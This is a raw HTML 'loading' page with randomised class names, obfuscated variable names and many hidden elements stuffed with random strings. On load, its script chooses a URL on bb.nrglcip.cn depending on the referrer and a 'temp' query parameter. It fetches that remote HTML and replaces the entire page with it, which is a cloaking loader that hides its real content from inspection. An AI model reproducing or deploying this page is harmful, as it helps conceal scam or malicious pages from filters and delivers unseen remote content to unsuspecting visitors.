<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YjHhxwy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YjHhxwy .bQdyK71TGna {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YjHhxwy .content {
            line-height: 50px;
            text-align: center
        }

        .YjHhxwy .img {
            width: 100%
        }

        .YjHhxwy .jpDruGF {
            text-align: center
        }

        .YjHhxwy .jpDruGF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YjHhxwy .jpDruGF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YjHhxwy .jpDruGF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YjHhxwy .jpDruGF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YjHhxwy .jpDruGF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YjHhxwy .jpDruGF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YjHhxwy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function w7AT5hiFU0ANo(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DLngc = w7AT5hiFU0ANo('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DLngc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DLngc +".html?a=share";
		}
		
        deukYPuJi2=url+"#"+new Date().getTime();
        deukYPuJi2 && function() {
            $.get(deukYPuJi2, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>ar1NTUUJbkGg03gByF8fUqxVYvJPMt7N2FLVCS77</span>
<a  href='#' style='display:none'>urduV4JErcIXBU60tozuNe6yGmJdxmOcBJDspEWNwVdHx0f70SHb7C9OwqULoS9n</a>
<p  style='display:none'>bn35GaVc4RYL72wE3dnjycfI7OzWTHmj4Y4WANWyYy3r5uioFNtcj12rKKF9mL7gF7CVG47iMfvoknpWR9ofoum7JOwoDEo0Qm4eo</p>
<ul style='display:none' >Ui6jg6GAmDVFF2E7Qc1xYsTyv0of49YLGv9fPoEUabeKsc4rz3CudtKhiKU91T</ul>
<li style='display:none' >zAamVnXXga8BTTSC6nYfDLcqv8EOW0Vqq92Va37DSMEN</li><div class="YjHhxwy">
    <div class="bQdyK71TGna">
        <div class="jpDruGF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >dLWerNpeaVa3WZ3wPIclmXQFv8Yk7jUl1Jqthz7Qyu3zRSaeVxsSJh2mOy</li>
<div style='display:none'>KFhxS2V2TkjZuMxvz4hBScbCyTgyly9GIxU7LfutA3</div>
<li style='display:none' >dLWerNpeaVa3WZ3wPIclmXQFv8Yk7jUl1Jqthz7Qyu3zRSaeVxsSJh2mOy</li>
<span style='display:none'>bB9EvIA8imv</span>
<p  style='display:none'>w4vcmqkmjsrZ</p>
<h1 style='display:none' >nzJ5ZWilvrpFN4D9R0GhxqN4RPu1yaPRfMrUBp5JZT4OypwHLeeaWouR8mjsVqGcOUFcIPbMOuDVR4IGjFMLxOIzafs0ve</h1>
<h1 style='display:none' >nzJ5ZWilvrpFN4D9R0GhxqN4RPu1yaPRfMrUBp5JZT4OypwHLeeaWouR8mjsVqGcOUFcIPbMOuDVR4IGjFMLxOIzafs0ve</h1>
<ul style='display:none' >XCh3IElcG9GE22tpBAq9PxD</ul>
<div style='display:none'>KFhxS2V2TkjZuMxvz4hBScbCyTgyly9GIxU7LfutA3</div></body>
</html>